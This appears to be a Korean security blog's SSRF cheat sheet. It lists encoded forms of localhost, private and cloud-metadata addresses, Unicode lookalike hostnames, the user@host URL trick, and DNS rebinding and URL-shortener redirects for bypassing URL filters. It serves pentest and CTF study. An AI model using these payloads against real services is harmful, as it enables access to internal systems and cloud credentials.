[Cheat Sheet] SSRF

SSRF 공격기법

localhost bypass

http://2130706433/ = http://127.0.0.1
http://3232235521/ = http://192.168.0.1
http://3232235777/ = http://192.168.1.1
http://2852039166/  = http://169.254.169.254
http://127.0.0.1
http://0.0.0.0
http://localhost
http://[::]
http://0000::1
http://spoofed.burpcollaborator.net
http://localtest.me
http://localhost.hahwul.com
http://127.127.127.127
http://127.0.1.3
http://127.0.0.0
http://0/
http://127.1
http://127.0.1
http://2130706433
http://0177.0.0.1
http://o177.0.0.1
http://0o177.0.0.1
http://q177.0.0.1
http://[0:0:0:0:0:ffff:127.0.0.1] #IPv6
http://0177.0.0.1/ = http://127.0.0.1
http://o177.0.0.1/ = http://127.0.0.1
http://0o177.0.0.1/ = http://127.0.0.1
http://q177.0.0.1/ = http://127.0.0.1
...

alphabet bypass

http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ = example.com

List:
① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ 
⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ 
⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ 
⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ 
Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ
ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ 
⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿

URL 구조 우회

url은 크게 scheme, hostname, port, user, password, path, query로 이루어져 있다. 자세한 내용은 url구조편에서 다루겠다.

url을 input받아서 필터링하는 곳에서 사용할 수 있는 우회법이다.

http://user:password@localhost/path

위의 구조와 같이 @를 사용하면 호스트는 뒤로 오기 때문에 netloc같은 함수를 사용해서 필터링할 때 사용할 수 있다.

DNS rebinding / url short

https://lock.cmpxchg8b.com/rebinder.html

rbndr.us dns rebinding service

lock.cmpxchg8b.com

rbndr로 DNS rebinding을 사용하여 주소를 우회할 수 있다.

https://www.shorturl.at/

ShortURL - URL Shortener

Simple and fast URL shortener! ShortURL allows to reduce long links from Instagram, Facebook, YouTube, Twitter, Linked In and top sites on the Internet, just paste the long URL and click the Shorten URL button. On the next screen, copy the shortened URL an

www.shorturl.at

shorturl을 사용하여 주소를 리다이렉팅 시킬 수 있으며 localhost나 특정한 주소의 필터링이 있다면 우회 할 수 있다.

참고 사이트

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery#ssrf-url-for-cloud-instances

GitHub - swisskyrepo/PayloadsAllTheThings: A list of useful payloads and bypass for Web Application Security and Pentest/CTF

A list of useful payloads and bypass for Web Application Security and Pentest/CTF - GitHub - swisskyrepo/PayloadsAllTheThings: A list of useful payloads and bypass for Web Application Security and ...

github.com

❗ 저작권

Right icon in Flaticons Lineal Color Style

icons8.com

https://icons8.com/icon/NXAECrAk3Vkg/code

Code icon in Pastel Style

icons8.com

https://icons8.com/icon/48250/암호

Code icon in Gradient Line Style

icons8.com

저작자표시 비영리 변경금지

'Hacking > Cheat Sheet' 카테고리의 다른 글

[Cheat Sheet] CSS Injection (0)	2022.08.03
[Cheat Sheet] Database Injection (0)	2022.07.26

SSRF 공격기법

localhost bypass

alphabet bypass

URL 구조 우회

DNS rebinding / url short

참고 사이트

❗ 저작권

'Hacking > Cheat Sheet' 카테고리의 다른 글

티스토리툴바